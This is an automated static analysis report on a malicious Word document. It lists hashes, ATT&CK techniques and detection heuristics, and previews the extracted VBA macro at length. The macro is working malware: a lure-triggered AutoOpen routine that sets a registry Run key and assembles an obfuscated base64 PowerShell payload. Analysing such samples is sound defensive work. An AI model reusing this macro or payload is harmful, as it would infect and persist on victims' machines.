Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0837f3935da0cda3…

MALICIOUS

Office (OLE)

446.0 KB Created: 2016-12-05 17:52:00 Authoring application: Microsoft Office Word First seen: 2018-02-07
MD5: 6694d9cea8d4695a1027e924211254f0 SHA-1: b9c2f34422af23c3d8e919eff1f9559372e35f6f SHA-256: 0837f3935da0cda378f15a7dfea4a9cb060f864154a2b150f1792a2cdf571f23
458 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1547.001 Registry Run Keys / Startup Folder T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document that uses a lure to convince the user to enable macros. Once enabled, the VBA script executes, leveraging WScript.Shell to write a PowerShell command to the registry Run key for persistence. The script also writes a base64 encoded PowerShell command to a registry value, which is then executed.

Heuristics 14

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim WshShell, bKey
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update", RunKey, "REG_SZ"
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    coucou = Environ("SYSTEMROOT")
    RunKey = coucou & "\System32\WindowsPowerShell\v1.0\powershell.exe -c " & Chr(34) & "powershell -enc $((gp HKCU:Software\Microsoft\Windows\CurrentVersion Revision).Revision)" & Chr(34)
    DebugKey = Str
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim WshShell, bKey
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update", RunKey, "REG_SZ"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "AfficherQuestion, 0, 1, MSForms, CommandButton"
    Sub AutoOpen()
        Call Main
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Dim coucou
    coucou = Environ("SYSTEMROOT")
    RunKey = coucou & "\System32\WindowsPowerShell\v1.0\powershell.exe -c " & Chr(34) & "powershell -enc $((gp HKCU:Software\Microsoft\Windows\CurrentVersion Revision).Revision)" & Chr(34)
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/cus1In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 104022 bytes
SHA-256: 5c8734deb31f9342a65c3f26ca2af2474ed0b53d3b49be416be25d56573de70f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Soumettre, 1, 0, MSForms, CommandButton"
Attribute VB_Control = "AfficherQuestion, 0, 1, MSForms, CommandButton"
Sub AutoOpen()
    Call Main
End Sub

Private Sub AfficherQuestion_Click()
    Full_array
End Sub

Private Sub Soumettre_Click()
    MsgBox ("Merci pour votre participation.")
    ActiveDocument.Close SaveChanges:=wdDoNotSaveChanges
End Sub

Private Sub Main()
    MsgBox "Nous vous remercions pour votre participation, ce questionnaire ne prendra que quelques instants."
    Call DoIt
End Sub

Public Function DoIt()
Dim Str As String
Str = Num1()

Dim RunKey
Dim DebugKey
Dim coucou
coucou = Environ("SYSTEMROOT")
RunKey = coucou & "\System32\WindowsPowerShell\v1.0\powershell.exe -c " & Chr(34) & "powershell -enc $((gp HKCU:Software\Microsoft\Windows\CurrentVersion Revision).Revision)" & Chr(34)
DebugKey = Str
Dim WshShell, bKey
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update", RunKey, "REG_SZ"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Revision", DebugKey, "REG_SZ"


End Function
Public Function Num1() As String

Dim Str As String

   Str = "SQ"
   Str = Str & "BuA"
   Str = Str & "HYA"
   Str = Str & "bwB"
   Str = Str & "rAG"
   Str = Str & "UAL"
   Str = Str & "QBD"
   Str = Str & "AG8"
   Str = Str & "AbQ"
   Str = Str & "BtA"
   Str = Str & "GEA"
   Str = Str & "bgB"
   Str = Str & "kAC"
   Str = Str & "AAL"
   Str = Str & "QBT"
   Str = Str & "AGM"
   Str = Str & "Acg"
   Str = Str & "BpA"
   Str = Str & "HAA"
   Str = Str & "dAB"
   Str = Str & "CAG"
   Str = Str & "wAb"
   Str = Str & "wBj"
   Str = Str & "AGs"
   Str = Str & "AIA"
   Str = Str & "B7A"
   Str = Str & "EEA"
   Str = Str & "ZAB"
   Str = Str & "kAC"
   Str = Str & "0AV"
   Str = Str & "AB5"
   Str = Str & "AHA"
   Str = Str & "AZQ"
   Str = Str & "AgA"
   Str = Str & "C0A"
   Str = Str & "QQB"
   Str = Str & "zAH"
   Str = Str & "MAZ"
   Str = Str & "QBt"
   Str = Str & "AGI"
   Str = Str & "AbA"
   Str = Str & "B5A"
   Str = Str & "CAA"
   Str = Str & "UwB"
   Str = Str & "5AH"
   Str = Str & "MAd"
   Str = Str & "ABl"
   Str = Str & "AG0"
   Str = Str & "ALg"
   Str = Str & "BTA"
   Str = Str & "GUA"
   Str = Str & "cgB"
   Str = Str & "2AG"
   Str = Str & "kAY"
   Str = Str & "wBl"
   Str = Str & "AE0"
   Str = Str & "Abw"
   Str = Str & "BkA"
   Str = Str & "GUA"
   Str = Str & "bAA"
   Str = Str & "uAF"
   Str = Str & "cAZ"
   Str = Str & "QBi"
   Str = Str & "ACw"
   Str = Str & "AUw"
   Str = Str & "B5A"
   Str = Str & "HMA"
   Str = Str & "dAB"
   Str = Str & "lAG"
   Str = Str & "0AL"
   Str = Str & "gBS"
   Str = Str & "AHU"
   Str = Str & "Abg"
   Str = Str & "B0A"
   Str = Str & "GkA"
   Str = Str & "bQB"
   Str = Str & "lAC"
   Str = Str & "4AU"
   Str = Str & "wBl"
   Str = Str & "AHI"
   Str = Str & "AaQ"
   Str = Str & "BhA"
   Str = Str & "GwA"
   Str = Str & "aQB"
   Str = Str & "6AG"
   Str = Str & "EAd"
   Str = Str & "ABp"
   Str = Str & "AG8"
   Str = Str & "Abg"
   Str = Str & "AKA"
   Str = Str & "GYA"
   Str = Str & "dQB"
   Str = Str & "uAG"
   Str = Str & "MAd"
   Str = Str & "ABp"
   Str = Str & "AG8"
   Str = Str & "Abg"
   Str = Str & "AgA"
   Str = Str & "EcA"
   Str = Str & "ZQB"
   Str = Str & "0AC"
   Str = Str & "0AR"
   Str = Str & "wBp"
   Str = Str & "AHM"
   Str = Str & "AdA"
   Str = Str & "BBA"
   Str = Str & "HUA"
   Str = Str & "dAB"
   Str = Str & "oAE"
   Str = Str & "gAZ"
   Str = Str & "QBh"
   Str = Str & "AGQ"
   Str = Str & "AZQ"
   Str = Str & "ByA"
   Str = Str & "CAA"
   Str = Str & "ewA"
   Str = Str & "KAC"
   Str = Str & "AAI"
   Str = Str & "AAg"
   Str = Str & "ACA"
   Str = Str & "AJA"
   Str = Str & "BHA"
   Str = Str & "GwA"
   Str = Str & "bwB"
   Str = Str & "iAG"
   Str = Str & "EAb"
   Str = Str & "AA6"
   Str = Str & "AFU"
   Str = Str & "Acw"
   Str = Str & "BlA"
   Str = Str & "HIA"
   Str = Str & "TgB"
   Str = Str & "hAG"
   Str = Str & "0AZ"
   Str = Str & "QAg"
   Str = Str & "AD0"
   Str = Str & "AIA"
   Str = Str & "AiA"
   Str = Str & "EYA"
   Str = Str & "cgB"
   Str = Str & "hAG"
   Str = Str & "4AY"
   Str = Str & "wBv"
   Str = Str & "AGk"
   Str = Str & "Acw"
   Str = Str & "BYA"
   Str = Str & "GEA"
   Str = Str & "IgA"
   Str = Str & "KAC"
   Str = Str & "AAI"
   Str = Str & "AAg"
   Str = Str & "ACA"
   Str = Str & "AJA"
   Str = Str & "BHA"
   Str = Str & "GwA"
   Str = Str & "bwB"
   Str = Str & "iAG"
   Str = Str & "EAb"
   Str = Str & "AA6"
   Str = Str & "AFA"
   Str = Str & "AYQ"
   Str = Str & "BzA"
   Str = Str & "HMA"
   Str = Str & "dwB"
   Str = Str & "vAH"
   Str = Str & "IAZ"
   Str = Str & "AAg"
   Str = Str & "AD0"
   Str = Str & "AIA"
   Str = Str & "AiA"
   Str = Str & "EYA"
   Str = Str & "cgB"
   Str = Str & "hAG"
   Str = Str & "4AY"
   Str = Str & "wBv"
   Str = Str & "AGk"
   Str = Str & "Acw"
   Str = Str & "BYA"
   Str = Str & "GEA"
   Str = Str & "MQA"
   Str = Str & "iAA"
   Str = Str & "oAC"
   Str = Str & "gAg"
   Str = Str & "ACA"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CQA"
   Str = Str & "YQB"
   Str = Str & "1AH"
   Str = Str & "QAa"
   Str = Str & "ABJ"
   Str = Str & "AG4"
   Str = Str & "AZg"
   Str = Str & "BvA"
   Str = Str & "CAA"
   Str = Str & "PQA"
   Str = Str & "gAC"
   Str = Str & "IAe"
   Str = Str & "wAw"
   Str = Str & "AH0"
   Str = Str & "AOg"
   Str = Str & "B7A"
   Str = Str & "DEA"
   Str = Str & "fQA"
   Str = Str & "iAC"
   Str = Str & "AAL"
   Str = Str & "QBm"
   Str = Str & "ACA"
   Str = Str & "AJA"
   Str = Str & "BHA"
   Str = Str & "GwA"
   Str = Str & "bwB"
   Str = Str & "iAG"
   Str = Str & "EAb"
   Str = Str & "AA6"
   Str = Str & "AFU"
   Str = Str & "Acw"
   Str = Str & "BlA"
   Str = Str & "HIA"
   Str = Str & "TgB"
   Str = Str & "hAG"
   Str = Str & "0AZ"
   Str = Str & "QAs"
   Str = Str & "ACA"
   Str = Str & "AJA"
   Str = Str & "BHA"
   Str = Str & "GwA"
   Str = Str & "bwB"
   Str = Str & "iAG"
   Str = Str & "EAb"
   Str = Str & "AA6"
   Str = Str & "AFA"
   Str = Str & "AYQ"
   Str = Str & "BzA"
   Str = Str & "HMA"
   Str = Str & "dwB"
   Str = Str & "vAH"
   Str = Str & "IAZ"
   Str = Str & "AAK"
   Str = Str & "ACA"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "JAB"
   Str = Str & "hAH"
   Str = Str & "UAd"
   Str = Str & "ABo"
   Str = Str & "AEk"
   Str = Str & "Abg"
   Str = Str & "BmA"
   Str = Str & "G8A"
   Str = Str & "IAA"
   Str = Str & "9AC"
   Str = Str & "AAW"
   Str = Str & "wBD"
   Str = Str & "AG8"
   Str = Str & "Abg"
   Str = Str & "B2A"
   Str = Str & "GUA"
   Str = Str & "cgB"
   Str = Str & "0AF"
   Str = Str & "0AO"
   Str = Str & "gA6"
   Str = Str & "AFQ"
   Str = Str & "Abw"
   Str = Str & "BCA"
   Str = Str & "GEA"
   Str = Str & "cwB"
   Str = Str & "lAD"
   Str = Str & "YAN"
   Str = Str & "ABT"
   Str = Str & "AHQ"
   Str = Str & "Acg"
   Str = Str & "BpA"
   Str = Str & "G4A"
   Str = Str & "ZwA"
   Str = Str & "oAF"
   Str = Str & "sAV"
   Str = Str & "ABl"
   Str = Str & "AHg"
   Str = Str & "AdA"
   Str = Str & "AuA"
   Str = Str & "EUA"
   Str = Str & "bgB"
   Str = Str & "jAG"
   Str = Str & "8AZ"
   Str = Str & "ABp"
   Str = Str & "AG4"
   Str = Str & "AZw"
   Str = Str & "BdA"
   Str = Str & "DoA"
   Str = Str & "OgB"
   Str = Str & "VAF"
   Str = Str & "QAR"
   Str = Str & "gA4"
   Str = Str & "AC4"
   Str = Str & "ARw"
   Str = Str & "BlA"
   Str = Str & "HQA"
   Str = Str & "QgB"
   Str = Str & "5AH"
   Str = Str & "QAZ"
   Str = Str & "QBz"
   Str = Str & "ACg"
   Str = Str & "AJA"
   Str = Str & "BhA"
   Str = Str & "HUA"
   Str = Str & "dAB"
   Str = Str & "oAE"
   Str = Str & "kAb"
   Str = Str & "gBm"
   Str = Str & "AG8"
   Str = Str & "AKQ"
   Str = Str & "ApA"
   Str = Str & "AoA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAI"
   Str = Str & "AAk"
   Str = Str & "AEc"
   Str = Str & "AbA"
   Str = Str & "BvA"
   Str = Str & "GIA"
   Str = Str & "YQB"
   Str = Str & "sAD"
   Str = Str & "oAW"
   Str = Str & "QBP"
   Str = Str & "AD0"
   Str = Str & "AIA"
   Str = Str & "AkA"
   Str = Str & "GEA"
   Str = Str & "dQB"
   Str = Str & "0AG"
   Str = Str & "gAS"
   Str = Str & "QBu"
   Str = Str & "AGY"
   Str = Str & "Abw"
   Str = Str & "AKA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAQ"
   Str = Str & "AB7"
   Str = Str & "AAo"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAI"
   Str = Str & "AAg"
   Str = Str & "ACc"
   Str = Str & "AQQ"
   Str = Str & "B1A"
   Str = Str & "HQA"
   Str = Str & "aAB"
   Str = Str & "vAH"
   Str = Str & "IAa"
   Str = Str & "QB6"
   Str = Str & "AGE"
   Str = Str & "AdA"
   Str = Str & "BpA"
   Str = Str & "G8A"
   Str = Str & "bgA"
   Str = Str & "nAC"
   Str = Str & "AAP"
   Str = Str & "QAg"
   Str = Str & "ACc"
   Str = Str & "AQg"
   Str = Str & "BhA"
   Str = Str & "HMA"
   Str = Str & "aQB"
   Str = Str & "jAC"
   Str = Str & "AAJ"
   Str = Str & "wAg"
   Str = Str & "ACs"
   Str = Str & "AIA"
   Str = Str & "AkA"
   Str = Str & "GEA"
   Str = Str & "dQB"
   Str = Str & "0AG"
   Str = Str & "gAS"
   Str = Str & "QBu"
   Str = Str & "AGY"
   Str = Str & "Abw"
   Str = Str & "AKA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAI"
   Str = Str & "AAg"
   Str = Str & "ACA"
   Str = Str & "AIA"
   Str = Str & "AnA"
   Str = Str & "EMA"
   Str = Str & "bwB"
   Str = Str & "uAH"
   Str = Str & "QAZ"
   Str = Str & "QBu"
   Str = Str & "AHQ"
   Str = Str & "ALQ"
   Str = Str & "BUA"
   Str = Str & "HkA"
   Str = Str & "cAB"
   Str = Str & "lAC"
   Str = Str & "cAI"
   Str = Str & "AA9"
   Str = Str & "ACA"
   Str = Str & "AJw"
   Str = Str & "BhA"
   Str = Str & "HAA"
   Str = Str & "cAB"
   Str = Str & "sAG"
   Str = Str & "kAY"
   Str = Str & "wBh"
   Str = Str & "AHQ"
   Str = Str & "AaQ"
   Str = Str & "BvA"
   Str = Str & "G4A"
   Str = Str & "LwB"
   Str = Str & "qAH"
   Str = Str & "MAb"
   Str = Str & "wBu"
   Str = Str & "ACc"
   Str = Str & "ACg"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAI"
   Str = Str & "AAg"
   Str = Str & "ACA"
   Str = Str & "AJw"
   Str = Str & "BVA"
   Str = Str & "HMA"
   Str = Str & "ZQB"
   Str = Str & "yAC"
   Str = Str & "0AQ"
   Str = Str & "QBn"
   Str = Str & "AGU"
   Str = Str & "Abg"
   Str = Str & "B0A"
   Str = Str & "CcA"
   Str = Str & "IAA"
   Str = Str & "9AC"
   Str = Str & "AAJ"
   Str = Str & "wBN"
   Str = Str & "AG8"
   Str = Str & "Aeg"
   Str = Str & "BpA"
   Str = Str & "GwA"
   Str = Str & "bAB"
   Str = Str & "hAC"
   Str = Str & "8AN"
   Str = Str & "QAu"
   Str = Str & "ADA"
   Str = Str & "AIA"
   Str = Str & "AoA"
   Str = Str & "FcA"
   Str = Str & "aQB"
   Str = Str & "uAG"
   Str = Str & "QAb"
   Str = Str & "wB3"
   Str = Str & "AHM"
   Str = Str & "AIA"
   Str = Str & "BOA"
   Str = Str & "FQA"
   Str = Str & "IAA"
   Str = Str & "2AC"
   Str = Str & "4AM"
   Str = Str & "QA7"
   Str = Str & "ACA"
   Str = Str & "AVw"
   Str = Str & "BPA"
   Str = Str & "FcA"
   Str = Str & "NgA"
   Str = Str & "0AD"
   Str = Str & "sAI"
   Str = Str & "ABy"
   Str = Str & "AHY"
   Str = Str & "AOg"
   Str = Str & "A0A"
   Str = Str & "DAA"
   Str = Str & "LgA"
   Str = Str & "wAC"
   Str = Str & "kAI"
   Str = Str & "ABH"
   Str = Str & "AGU"
   Str = Str & "AYw"
   Str = Str & "BrA"
   Str = Str & "G8A"
   Str = Str & "LwA"
   Str = Str & "yAD"
   Str = Str & "AAM"
   Str = Str & "QAw"
   Str = Str & "ADA"
   Str = Str & "AMQ"
   Str = Str & "AwA"
   Str = Str & "DEA"
   Str = Str & "IAB"
   Str = Str & "GAG"
   Str = Str & "kAc"
   Str = Str & "gBl"
   Str = Str & "AGY"
   Str = Str & "Abw"
   Str = Str & "B4A"
   Str = Str & "C8A"
   Str = Str & "NAA"
   Str = Str & "wAC"
   Str = Str & "4AM"
   Str = Str & "QAn"
   Str = Str & "AAo"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAB"
   Str = Str & "9AA"
   Str = Str & "oAf"
   Str = Str & "QAK"
   Str = Str & "AAo"
   Str = Str & "AZg"
   Str = Str & "B1A"
   Str = Str & "G4A"
   Str = Str & "YwB"
   Str = Str & "0AG"
   Str = Str & "kAb"
   Str = Str & "wBu"
   Str = Str & "ACA"
   Str = Str & "AQw"
   Str = Str & "BvA"
   Str = Str & "G4A"
   Str = Str & "dgB"
   Str = Str & "lAH"
   Str = Str & "IAd"
   Str = Str & "AAt"
   Str = Str & "AFg"
   Str = Str & "AbQ"
   Str = Str & "BsA"
   Str = Str & "FQA"
   Str = Str & "bwB"
   Str = Str & "KAH"
   Str = Str & "MAb"
   Str = Str & "wBu"
   Str = Str & "ACg"
   Str = Str & "AWw"
   Str = Str & "B4A"
   Str = Str & "G0A"
   Str = Str & "bAB"
   Str = Str & "dAC"
   Str = Str & "QAe"
   Str = Str & "ABt"
   Str = Str & "AGw"
   Str = Str & "AKQ"
   Str = Str & "AKA"
   Str = Str & "HsA"
   Str = Str & "CgA"
   Str = Str & "gAC"
   Str = Str & "AAI"
   Str = Str & "AAg"
   Str = Str & "ACQ"
   Str = Str & "AbQ"
   Str = Str & "BlA"
   Str = Str & "G0A"
   Str = Str & "UwB"
   Str = Str & "0AH"
   Str = Str & "IAZ"
   Str = Str & "QBh"
   Str = Str & "AG0"
   Str = Str & "AIA"
   Str = Str & "A9A"
   Str = Str & "CAA"
   Str = Str & "bgB"
   Str = Str & "lAH"
   Str = Str & "cAL"
   Str = Str & "QBv"
   Str = Str & "AGI"
   Str = Str & "Aag"
   Str = Str & "BlA"
   Str = Str & "GMA"
   Str = Str & "dAA"
   Str = Str & "gAF"
   Str = Str & "MAe"
   Str = Str & "QBz"
   Str = Str & "AHQ"
   Str = Str & "AZQ"
   Str = Str & "BtA"
   Str = Str & "C4A"
   Str = Str & "SQB"
   Str = Str & "PAC"
   Str = Str & "4AT"
   Str = Str & "QBl"
   Str = Str & "AG0"
   Str = Str & "Abw"
   Str = Str & "ByA"
   Str = Str & "HkA"
   Str = Str & "UwB"
   Str = Str & "0AH"
   Str = Str & "IAZ"
   Str = Str & "QBh"
   Str = Str & "AG0"
   Str = Str & "ACg"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "QAa"
   Str = Str & "gBz"
   Str = Str & "AG8"
   Str = Str & "Abg"
   Str = Str & "BXA"
   Str = Str & "HIA"
   Str = Str & "aQB"
   Str = Str & "0AG"
   Str = Str & "UAc"
   Str = Str & "gAg"
   Str = Str & "AD0"
   Str = Str & "AIA"
   Str = Str & "BbA"
   Str = Str & "FMA"
   Str = Str & "eQB"
   Str = Str & "zAH"
   Str = Str & "QAZ"
   Str = Str & "QBt"
   Str = Str & "AC4"
   Str = Str & "AUg"
   Str = Str & "B1A"
   Str = Str & "G4A"
   Str = Str & "dAB"
   Str = Str & "pAG"
   Str = Str & "0AZ"
   Str = Str & "QAu"
   Str = Str & "AFM"
   Str = Str & "AZQ"
   Str = Str & "ByA"
   Str = Str & "GkA"
   Str = Str & "YQB"
   Str = Str & "sAG"
   Str = Str & "kAe"
   Str = Str & "gBh"
   Str = Str & "AHQ"
   Str = Str & "AaQ"
   Str = Str & "BvA"
   Str = Str & "G4A"
   Str = Str & "LgB"
   Str = Str & "KAH"
   Str = Str & "MAb"
   Str = Str & "wBu"
   Str = Str & "AC4"
   Str = Str & "ASg"
   Str = Str & "BzA"
   Str = Str & "G8A"
   Str = Str & "bgB"
   Str = Str & "SAG"
   Str = Str & "UAY"
   Str = Str & "QBk"
   Str = Str & "AGU"
   Str = Str & "Acg"
   Str = Str & "BXA"
   Str = Str & "HIA"
   Str = Str & "aQB"
   Str = Str & "0AG"
   Str = Str & "UAc"
   Str = Str & "gBG"
   Str = Str & "AGE"
   Str = Str & "AYw"
   Str = Str & "B0A"
   Str = Str & "G8A"
   Str = Str & "cgB"
   Str = Str & "5AF"
   Str = Str & "0AO"
   Str = Str & "gA6"
   Str = Str & "AEM"
   Str = Str & "Acg"
   Str = Str & "BlA"
   Str = Str & "GEA"
   Str = Str & "dAB"
   Str = Str & "lAE"
   Str = Str & "oAc"
   Str = Str & "wBv"
   Str = Str & "AG4"
   Str = Str & "AVw"
   Str = Str & "ByA"
   Str = Str & "GkA"
   Str = Str & "dAB"
   Str = Str & "lAH"
   Str = Str & "IAK"
   Str = Str & "AAk"
   Str = Str & "AG0"
   Str = Str & "AZQ"
   Str = Str & "BtA"
   Str = Str & "FMA"
   Str = Str & "dAB"
   Str = Str & "yAG"
   Str = Str & "UAY"
   Str = Str & "QBt"
   Str = Str & "ACk"
   Str = Str & "ACg"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAH"
   Str = Str & "QAc"
   Str = Str & "gB5"
   Str = Str & "AAo"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAB"
   Str = Str & "7AA"
   Str = Str & "oAI"
   Str = Str & "AAg"
   Str = Str & "ACA"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "QAe"
   Str = Str & "ABt"
   Str = Str & "AGw"
   Str = Str & "ALg"
   Str = Str & "BTA"
   Str = Str & "GEA"
   Str = Str & "dgB"
   Str = Str & "lAC"
   Str = Str & "gAJ"
   Str = Str & "ABq"
   Str = Str & "AHM"
   Str = Str & "Abw"
   Str = Str & "BuA"
   Str = Str & "FcA"
   Str = Str & "cgB"
   Str = Str & "pAH"
   Str = Str & "QAZ"
   Str = Str & "QBy"
   Str = Str & "ACk"
   Str = Str & "ACg"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAI"
   Str = Str & "AAg"
   Str = Str & "ACA"
   Str = Str & "AJA"
   Str = Str & "BiA"
   Str = Str & "HkA"
   Str = Str & "dAB"
   Str = Str & "lAH"
   Str = Str & "MAI"
   Str = Str & "AA9"
   Str = Str & "ACA"
   Str = Str & "AJA"
   Str = Str & "BtA"
   Str = Str & "GUA"
   Str = Str & "bQB"
   Str = Str & "TAH"
   Str = Str & "QAc"
   Str = Str & "gBl"
   Str = Str & "AGE"
   Str = Str & "AbQ"
   Str = Str & "AuA"
   Str = Str & "FQA"
   Str = Str & "bwB"
   Str = Str & "BAH"
   Str = Str & "IAc"
   Str = Str & "gBh"
   Str = Str & "AHk"
   Str = Str & "AKA"
   Str = Str & "ApA"
   Str = Str & "AoA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAI"
   Str = Str & "AAg"
   Str = Str & "ACA"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "FsA"
   Str = Str & "UwB"
   Str = Str & "5AH"
   Str = Str & "MAd"
   Str = Str & "ABl"
   Str = Str & "AG0"
   Str = Str & "ALg"
   Str = Str & "BUA"
   Str = Str & "GUA"
   Str = Str & "eAB"
   Str = Str & "0AC"
   Str = Str & "4AR"
   Str = Str & "QBu"
   Str = Str & "AGM"
   Str = Str & "Abw"
   Str = Str & "BkA"
   Str = Str & "GkA"
   Str = Str & "bgB"
   Str = Str & "nAF"
   Str = Str & "0AO"
   Str = Str & "gA6"
   Str = Str & "AFU"
   Str = Str & "AVA"
   Str = Str & "BGA"
   Str = Str & "DgA"
   Str = Str & "LgB"
   Str = Str & "HAG"
   Str = Str & "UAd"
   Str = Str & "ABT"
   Str = Str & "AHQ"
   Str = Str & "Acg"
   Str = Str & "BpA"
   Str = Str & "G4A"
   Str = Str & "ZwA"
   Str = Str & "oAC"
   Str = Str & "QAY"
   Str = Str & "gB5"
   Str = Str & "AHQ"
   Str = Str & "AZQ"
   Str = Str & "BzA"
   Str = Str & "CwA"
   Str = Str & "MAA"
   Str = Str & "sAC"
   Str = Str & "QAY"
   Str = Str & "gB5"
   Str = Str & "AHQ"
   Str = Str & "AZQ"
   Str = Str & "BzA"
   Str = Str & "C4A"
   Str = Str & "TAB"
   Str = Str & "lAG"
   Str = Str & "4AZ"
   Str = Str & "wB0"
   Str = Str & "AGg"
   Str = Str & "AKQ"
   Str = Str & "AKA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAf"
   Str = Str & "QAK"
   Str = Str & "ACA"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "ZgB"
   Str = Str & "pAG"
   Str = Str & "4AY"
   Str = Str & "QBs"
   Str = Str & "AGw"
   Str = Str & "AeQ"
   Str = Str & "AKA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAe"
   Str = Str & "wAK"
   Str = Str & "ACA"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAA"
   Str = Str & "gAC"
   Str = Str & "AAI"
   Str = Str & "AAk"
   Str = Str & "AGo"
   Str = Str & "Acw"
   Str = Str & "BvA"
   Str = Str & "G4A"
   Str = Str & "VwB"
   Str = Str & "yAG"
   Str = Str & "kAd"
   Str = Str & "ABl"
   Str = Str & "AHI"
   Str = Str & "ALg"
   Str = Str & "BDA"
   Str = Str & "GwA"
   Str = Str & "bwB"
   Str = Str & "zAG"
   Str = Str & "UAK"
   Str = Str & "AAp"
   Str = Str & "AAo"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "IAB"
   Str = Str & "9AA"
   Str = Str & "oAf"
   Str = Str & "QAK"
   Str = Str & "AAo"
   Str = Str & "AZg"
   Str = Str & "B1A"
   Str = Str & "G4A"
   Str = Str & "YwB"
   Str = Str & "0AG"
   Str = Str & "kAb"
   Str = Str & "wBu"
   Str = Str & "ACA"
   Str = Str & "AQw"
   Str = Str & "BvA"
   Str = Str & "G4A"
   Str = Str & "dgB"
   Str = Str & "lAH"
   Str = Str & "IAd"
   Str = Str & "AAt"
   Str = Str & "AEo"
   Str = Str & "Acw"
   Str = Str & "BvA"
   Str = Str & "G4A"
   Str = Str & "VAB"
   Str = Str & "vAF"
   Str = Str & "gAb"
   Str = Str & "QBs"
   Str = Str & "ACg"
   Str = Str & "AWw"
   Str = Str & "BzA"
   Str = Str & "HQA"
   Str = Str & "cgB"
   Str = Str & "pAG"
   Str = Str & "4AZ"
   Str = Str & "wBd"
   Str = Str & "ACQ"
   Str = Str & "Aag"
